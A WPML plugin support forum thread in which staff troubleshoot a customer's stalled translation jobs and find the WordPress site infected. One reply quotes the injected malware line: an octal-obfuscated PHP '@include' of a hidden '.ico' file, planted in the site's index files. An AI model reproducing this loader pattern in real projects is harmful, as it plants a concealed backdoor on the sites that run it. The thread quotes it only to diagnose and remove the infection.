Skip Navigation

This is the technical support forum for WPML - the multilingual WordPress plugin.

Everyone can read, but only WPML clients can post here. WPML team is replying on the forum 6 days per week, 22 hours per day.

This topic contains 9 replies, has 3 voices.

Last updated by Alejandro 4 months, 3 weeks ago.

Assigned support staff: Alejandro.

Author Posts
September 26, 2020 at 6:00 am #7104413

triloks

Tell us what you are trying to do?
When i put content in bucket and click to send all item to translation, it get the process and not complete.
Is there any documentation that you are following?
no
Is there a similar example that we can see?

What is the link to your site?
hidden link

September 26, 2020 at 11:26 am #7105165

Amit
Supporter

Hi there,

The debug information you have shared looks OK (thanks for sharing with us).

- Do you see any error message after you send it to translation?

September 26, 2020 at 11:58 am #7105445

triloks

Hi amit,

I have tried to send a few posts for translation but there is nothing working. There is no error and it keeps running.

September 28, 2020 at 6:55 am #7111517

Alejandro
Supporter

Languages: English (English ) Spanish (Español ) Italian (Italiano )

Timezone: Europe/Rome (GMT+01:00)

Hello!

I would like you to try the following:

1) try to disable all your plug-ins except all the WPML ones.

2) try to recreate the problem (looks like you can't send them from the basket to the translation job tab, right?)

3) does it work now?

4) if it doesn't, then revert your theme to the default one "twentytwenty"

If any of these steps work. Let me know and start activating the plugins one by one until you get the issue again.

Let me know how it goes.

October 4, 2020 at 7:38 am #7158797

triloks

Hi Alejandro,

I have deactivated all plugin expect woo-commerce and wpml and changed the theme to default but still not working.

wpml.jpg
October 5, 2020 at 8:15 am #7162933

Alejandro
Supporter

Languages: English (English ) Spanish (Español ) Italian (Italiano )

Timezone: Europe/Rome (GMT+01:00)

To continue, I'll need temporary access to your site, so i can take a closer look at the problem.

I have just activated the appropriate boxes for the credential information i need from you. they are private so only you and i will be able to see them.

I suggest you create a temporary user, set it as an administrator and then add those credentials in the fields mentioned above.

I'd also need you to confirm that i can disable (temporarily and fast) your active plugins and themes while i run some tests, please.

Thanks in advance.

October 5, 2020 at 6:03 pm #7167669

Alejandro
Supporter

Languages: English (English ) Spanish (Español ) Italian (Italiano )

Timezone: Europe/Rome (GMT+01:00)

The reason why things are not working is because of a likely malware that you might be having in your site.

I'm saying this because of a code found in ALL the index.php / index.html files i could find in the site that is more than suspicious:

/*52817*/

@include "\057home\057maro\164hjew\145ls/p\165blic\137html\057wp-a\144min/\151mage\163/.13\1431679\141.ico";

/*52817*/

that takes you to an ".ico" file in the wp-admin page apparently, that creates a redirection so i can only guess that the redirection basically just leaves the processes and requests in the site hanging there until they time out.

I would suggest that you clean your site and let me know if it keeps working.

By experience i would suggest you check the following files in all your site:
- Header.php
- footer.php
- index.php
- index.html

Files in wp-content and wp-admin on its whole (basically delete and re-install WordPress).

This is of course outside of the scope of our support so we can't really help there at all, i just wanted to give you a hand getting started.

Regards.

October 14, 2020 at 9:44 am #7226009

triloks

thanks for indicating the virus. we have successfully removed it. Please check now as still, i am not able to translate using auto-translation. the same issue still going on my website.

October 14, 2020 at 12:24 pm #7227621

Alejandro
Supporter

Languages: English (English ) Spanish (Español ) Italian (Italiano )

Timezone: Europe/Rome (GMT+01:00)

It looks like the old credentials that you gave me are not working there anymore, could you please double check and send me new ones?

Thanks in advance.

October 15, 2020 at 8:11 am #7233739

Alejandro
Supporter

Languages: English (English ) Spanish (Español ) Italian (Italiano )

Timezone: Europe/Rome (GMT+01:00)

Please check this video: hidden link

Your site has a few issues that might be interfering with our plugins:

1) It constantly throws a lot of errors in the JS inspector, they seem to be harmless but they might stop some things from working correctly. you can check this by right click > Inspect > Console in chrome.

2) The site seems to have REST either disabled or restricted and that is affecting right now Yoast but it might affect us too since we also use REST

As a next text, i'd suggest you disable all your plugins and then try to see if WPML works now and if it doesn't work, please write in the next comment the steps you took to recreate the problem.

Regards.

The topic ‘[Closed] Automatic translation not working’ is closed to new replies.